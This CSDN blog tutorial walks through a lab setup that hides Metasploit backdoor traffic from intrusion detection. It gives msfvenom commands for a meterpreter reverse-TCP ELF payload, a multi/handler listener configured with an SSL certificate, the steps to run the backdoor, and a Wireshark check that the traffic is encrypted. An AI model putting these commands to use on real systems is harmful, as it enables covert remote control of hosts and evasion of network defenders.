MSF流量加密

已于 2024-01-14 11:13:17 修改
阅读量634 收藏 11
点赞数 9
分类专栏: 内网渗透 web 基于kali的渗透测试 文章标签: 网络 web安全 MSF ssl
于 2024-01-13 19:57:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Myon5/article/details/135573895
版权

1、背景介绍

在MSF中生成shell,并上线运行时。都是通过`http` `https` `tcp`等协议传输。虽然MSF本身会对流量进行加密,但MSF太出名以致于其加密特征容易被IPS,WAF等可以检测带有攻击的特征的设备拦截或记录。

2、生成 SSL 证书

openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes

3、使用 MSF 生成带证书的后门

针对不同版本 msf 的不同命令

其中 lhost 为本机 IP,mshell.elf 为生成的文件名

msf5:

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.249.132 LPORT=8888 -f elf > mshell.elf

msf6:

msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=192.168.249.132 LPORT=8888 -f elf > mshell.elf

我这里是 msf6

使用 ls 命令查前面生成的相应证书和文件

4、配置带证书的 MSF 后门监听

启动MSF

msfdb run

选择攻击载荷

use exploit/multi/handler

 设置payload、监听IP、端口以及证书

set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.249.132
set lport 8888
set HandlerSSLCert /home/kali/key.pem

开启监听

exploit

5、meterpreter 会话建立与 shell 命令执行

将 mshell.elf 放到另一台 kali 

对该文件加权后执行 

chmod u+x mshell.elf
./mshell.elf

可以发现连接建立成功并且可以执行 shell 命令

6、使用wireshark抓包进行流量验证

开启wireshark抓取eth0

执行ifconfig

分析数据包,看不出任何与ifconfig有关的信息

包括响应包的内容,也是被加密了的

Myon⁶
关注
专栏目录
msf windows版
09-22
msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版
【红队APT】反朔源&流量加密&CS&MSF&证书指纹&C2项目&CDN域前置
今天是几号的博客
04-18 2314
生成后在虚拟机中上线,不过遇到了奇怪的事情就是,我在上线的虚拟机中抓不到http流量的数据包,而在物理机中抓到了(emmm我也不太懂为什么会这样)红队进行权限控制,主机开始限制出网,尝试走常见出网协议http/https,结果流量设备入侵检测检测系统发现异常,尝试修改工具指纹特征加密流量防止检测,结果被定位到控制服务器,这里可以看到msf自带的证书,这里我们对该证书进行伪装(这里其实流量上没做什么改变,知识对默认证书指纹做了修改)这里可以看到,流量进行了加密,只能隐约的看到一些ssl证书信息。
红队隧道加密MSF流量加密(二)
xf555er的博客
11-26 2142
如今大多数企业的内网都部署了流量审计服务, 用来专门分析流量特征, 比如后门特征和行为特征若直接使用Metasploit对内网进行横向渗透, 其产生的流量会很容易被内网防护工具检测出来, 因此需对流量进行加密来绕过检测这里介绍使用OpenSSLMSF流量进行加密
MSF流量加密_msf 流量加密网络安全进程保活黑科技实现原理解密及方法
2401_84181286的博客
04-10 380
我这里是 msf6使用 ls 命令查前面生成的相应证书和文件。
老朋友渗透测试+流量分析初尝试
susuate的博客
07-18 2446
因为图像隐写的实验需要用到malab函数,这里把学习过程中用到的基础的函数做一个汇总,方便之后查看。 -[r,c]=size(A) 当有两个输出参数时,size函数将矩阵的行数返回到第一个输出变量r,将矩阵的列数返回到第二个输出变量c。 -Floor函数 向下取整,去掉小数部分 Y = rand(m,n) 或 Y = rand([m n]) 返回一个m x n的随机矩阵。 ...
MSF流量加密_msf 流量加密,2024最新阿里网络安全高级面试题总结
HUAXIAL的博客
04-08 377
MSF中生成shell,并上线运行时。都是通过httphttpstcp等协议传输。虽然MSF本身会对流量进行加密,但MSF太出名以致于其加密特征容易被IPS,WAF等可以检测带有攻击的特征的设备拦截或记录。
MSF技术总结
05-07
MSF 技术总结 MSF(Metasploit Framework)是一款功能强大且广泛使用的渗透测试工具,提供了丰富的命令和插件,帮助渗透测试者快速发现和利用系统漏洞。本文将对 MSF 的使用和高级用法进行总结。 一、MSF 架构 ...
kali 渗透msf
11-14
kali渗透测试利器
msf开发者文档
09-28
msf开发者文档是专门为了让开发人员理解和利用Metasploit框架(MSF)进行安全研究和开发的详细指南。 文档从介绍为何Metasploit选择了Ruby语言作为其开发语言开始。Ruby是一种广泛应用于Web开发的高级编程语言,它...
项目管理利刃之MSF
03-03
火龙果软件工程技术中心 MSF,MicrosoftSolutionFramework,微软解决方案框架是一个在预算范围内按期创建一个业务解决方案需要一种经过检验的方法。本文将结合MSF在项目管理中的实际应用进行讲解,如果您是软件项目...
流量加密小结
RestoreJustice的博客
09-17 328
在红队进行渗透测试的后续渗透阶段为了扩大战果,往往需要进行横行渗透,所以需要拿到shell建立与目标之间的通信,当目标主机网络环境存在网络防御检测系统时(IDS、IPS等),如果攻击机与目标间通信的流量是明文传输,那么网络防御检测系统会检测出通信内容中带有的攻击特征,并对当前通信进行告警和阻止
红蓝对抗之流量加密(Openssl加密传输、MSF流量加密、CS修改profile进行流量加密)
qq_50854662的博客
06-01 1236
红蓝对抗之流量加密(Openssl加密传输、MSF流量加密、CS修改profile进行流量加密)
应急响应-MSF流量分析&模式模块&特征提取
siu~
04-13 1240
战后-流量分析-MSF
网络安全进阶篇之流量加密(十三章-2)MSF流量加密躲避检测
划水的小白白
05-19 3431
文章目录一、为什么要加密二、创建证书三、上线MSF四、抓取流量测试五、不上线的情况5.1、经过测试win7系统无法上线。5.2、看看配置是否正确 一、为什么要加密 为了防止主机被入侵,现在大部分的内网环境都装有流量审计工具, 专门用来分析审查流量特征,分析网络流量,如后门特征、行为特征, 像 metasploit 在内网做横行渗透时,这些流量很容易就能被检测出来, 所以做好流量加密,就能避免审计工具检测出来。 大概过程: 使用openssl生成加密正常, msf生成木马的时候将证书加进去, 设置
MSF流量加密躲避检测
m0_50526465的博客
05-04 577
MSF流量加密躲避检测 对于OpenSSL不了解的,可以去看下我上一篇文章 使用Openssl加密 生成证书 这里C=UK;ST=London等可以对应下面的HTTPS证书看就明白是怎么回事了 openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \ -subj "/C=UK/ST=London/L=London/O=Development/CN=www.baidu.com" \ -keyout www.baidu.com.key \ -out w
应急响应——IDS&IPS&msf流量&后门分析
m0_61506558的博客
03-29 936
可以通过top命令查看恶意的流量信息,可以观察到test的流量非常可疑,有一定渗透经验的话可以判断出xmrig文件是常见的挖矿文件,我们也可以将文件放在微步在线、360威胁情报平台、venuseye、安恒威胁情报中心、360威胁情报中心、绿盟威胁情报中心、AlienVault。查看windows下的定时任务列表,找到可疑文件,接下来我们就要找到这个定时任务是怎么添加上去的,即找到漏洞入口在哪里。假如说我们开放了3389远程登入端口,就可以查看计算机管理下的安全日志,会留下攻击者爆破信息。
msf后门流量分析
最新发布
2301_76227305的博客
04-15 1697
以上就是msf后门流量的特征啦最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
护网面试总结
zhihuijiazeng的博客
06-08 5085
从大佬的经验摘过来的
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Myon⁶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值